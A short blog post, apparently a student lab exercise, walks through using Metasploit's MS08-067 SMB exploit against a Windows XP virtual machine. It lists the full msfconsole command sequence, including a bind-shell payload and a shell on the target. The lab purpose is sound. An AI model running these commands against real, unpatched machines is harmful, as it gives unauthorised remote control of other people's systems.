Saturday, 22 December 2012

Metasploit at SMB


first we used msfconsol, to use msfconsole can be through terminal
command :
root@bt:~# msfconsole
don't forget to open windows xp at virtual box.
screen shot;

this screen shot for information gathering at smb

This time I will use exploit/windows/smb/ms08_067_netapi
command :
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

screen shot like this
then, command :
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.101
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > exploit
screen shot
Now we've been in the windows system, to prove we can type dir
command
C:\WINDOWS\system32>dir

then click enter.
Screen shot like this.
Finish.

0 comments:

Post a Comment